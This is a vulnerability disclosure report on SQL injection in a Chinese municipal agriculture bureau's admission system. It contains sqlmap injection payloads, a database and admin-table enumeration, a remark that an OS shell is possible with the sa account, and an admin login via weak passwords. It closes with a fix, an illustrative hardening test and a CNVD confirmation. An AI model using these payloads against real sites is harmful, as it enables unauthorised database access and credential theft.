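2015-09-15: Details sent to the vendor; awaiting vendor handling
2015-09-17: CNCERT (National Internet Emergency Center) has not yet been able to contact the organization concerned; details disclosed only to the notifying agency
2015-09-27: Details disclosed to core white hats and experts in related fields
2015-10-07: Details disclosed to regular white hats
2015-10-17: Details disclosed to intern white hats
2015-11-01: Details disclosed to the public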
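Company: What do I do if my registration filing doesn't get approved? Black hat: 2000 yuan, approval guaranteed.
Tangshan Municipal Agriculture and Animal Husbandry Bureau, Agricultural Inputs Admission System
http://**.**.**.**/ApplicationSearch.aspx?type=1
The database user has SA privileges, so --os-shell is possible again~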
---
Parameter: type (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=1 AND 5994=5994

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: type=1 AND 5104=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (5104=5104) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)))

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: type=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4677=4677) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113))

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: type=1 OR 3921=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
current user: 'sa'
sqlmap resumed the following injection point(s) from stored session:
---
Tables:
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: TSAA_Application1
[60 tables]
+-------------------------------+
| Application                   |
| ApplicationStatus             |
| Area                          |
| BusinessField                 |
| Company                       |
| CompanyBusinessField          |
| CompanyStatus                 |
| CompanyType                   |
| Education                     |
| Log                           |
| MarketPermission              |
| ProcessDocument               |
| Producer                      |
| Product                       |
| ProductStatus                 |
| ProductionDocument            |
| QualityAssurance              |
| QualityTest                   |
| cms_advs_advscontent          |
| cms_advs_advscustomers        |
| cms_advs_advshits             |
| cms_content_1                 |
| cms_content_2                 |
| cms_content_3                 |
| cms_content_4                 |
| cms_content_5                 |
| cms_content_6                 |
| cms_content_Content           |
| cms_content_ContentUpFile     |
| cms_log_ContentClickLog       |
| cms_model_FormInputLimitType  |
| cms_model_FormInputType       |
| cms_model_FormInputValue      |
| cms_model_FormInputValueType  |
| cms_model_Model               |
| cms_model_ModelField          |
| cms_node_ContentPubType       |
| cms_node_Node                 |
| cms_node_NodeAddionalPub      |
| cms_node_NodeContentSort      |
| cms_node_NodeGroup            |
| cms_node_NodeType             |
| cms_oper_log                  |
| cms_pub_pubTask               |
| cms_rec_Recom                 |
| cms_rec_RecomContent          |
| cms_rec_RecomTemplate         |
| cms_sys_ContentWorkFlow       |
| cms_sys_Log                   |
| cms_sys_PSN                   |
| cms_sys_ParamType             |
| cms_sys_TimeZone              |
| cms_sys_WordReplace           |
| cms_user_AdminUsers           |
| cms_user_UserBase             |
| cms_user_UserPermission       |
| cms_vwAllBaseInfo             |
| cms_vwCommendAllInfo          |
| cms_vwContentBaseInfoForClick |
| cms_vwContentClickLog         |
+-------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Admin table:
Table: cms_user_AdminUsers
[10 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| AddTime       | datetime |
| LastLogTime   | datetime |
| LogName       | nvarchar |
| LogPWD        | varchar  |
| Name          | nvarchar |
| NodeIds       | nvarchar |
| PermissionIds | varchar  |
| PubCount      | int      |
| Sex           | bit      |
| UserBaseId    | int      |
+---------------+----------+
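The dumped data:
All weak passwords... logging in to the admin backend with an administrator account as proof.
Input filtering + no weak passwords + hide the admin backend + least privilege for the database account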
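The "input filtering" item in the fix above, checked against the boolean-based payload sqlmap reported for the type parameter. This is an added example, not code from the affected site: SQLite stands in for SQL Server, and the table contents, function names and the false-condition variant 5994=5995 are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; SQLite stands in for the SQL Server back end.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Application (id INTEGER, type INTEGER, name TEXT)")
    db.executemany("INSERT INTO Application VALUES (?, ?, ?)",
                   [(1, 1, "seed"), (2, 1, "fertilizer"), (3, 2, "pesticide")])
    return db

def search_vulnerable(db, type_param):
    # The request value is pasted into the SQL text, so anything after the
    # number is parsed as SQL. This is the pattern behind the report.
    sql = "SELECT name FROM Application WHERE type = " + type_param
    return [row[0] for row in db.execute(sql)]

def parse_type(type_param):
    # Filtering: the parameter is a small integer id, so accept only that.
    if not (type_param.isascii() and type_param.isdigit() and len(type_param) <= 9):
        raise ValueError("type must be a non-negative integer")
    return int(type_param)

def search_hardened(db, type_param):
    # Validate first, then bind the value; it never becomes part of the SQL text.
    sql = "SELECT name FROM Application WHERE type = ?"
    return [row[0] for row in db.execute(sql, (parse_type(type_param),))]

def is_injectable(search, db):
    # Regression check modelled on the boolean-based finding: a true and a
    # false condition appended to the value change the result set only if
    # the appended text is executed as SQL.
    try:
        true_rows = search(db, "1 AND 5994=5994")
        false_rows = search(db, "1 AND 5994=5995")
    except ValueError:
        return False  # rejected before reaching the database
    return true_rows != false_rows

if __name__ == "__main__":
    db = make_db()
    print("concatenated query injectable:", is_injectable(search_vulnerable, db))
    print("validated + bound query injectable:", is_injectable(search_hardened, db))
```

Validation and parameter binding close the injection point; running the web application under a database login other than sa is what limits the damage if another injection point exists.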
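Severity: High
Vulnerability Rank: 11
Confirmed: 2015-09-17 15:55
CNVD confirmed and reproduced the issue described and has passed it to CNCERT for delivery to the Hebei sub-center, which will coordinate follow-up handling with the organization that operates the site.
None yet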